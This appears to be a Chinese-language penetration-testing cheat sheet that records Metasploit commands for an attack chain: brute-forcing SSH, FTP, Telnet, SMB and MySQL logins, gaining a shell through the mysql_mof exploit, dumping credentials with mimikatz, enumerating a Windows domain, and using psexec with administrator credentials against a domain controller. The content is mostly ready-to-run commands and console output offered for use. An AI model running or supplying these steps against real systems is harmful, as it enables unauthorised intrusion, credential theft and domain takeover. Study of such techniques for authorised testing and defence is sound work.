msf各种弱口令爆破

Msf:

记录下msf各个爆破弱口令的模块

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

 

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用扫描模块

use scanner/portscan/tcp

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login  

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login  

爆破smb

auxiliary/scanner/smb/smb_login

爆破Mysql

use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt

使用mof模块进行权限获取

use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit

Mimikatz导出hash

<p>meterpreter &gt; load mimikatz</p> 
<p>meterpreter &gt; kerberos</p> 

一些域内的命令

查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的用户列表
net user /domain
获取域用户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控
net group "domain admins" /domain 

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit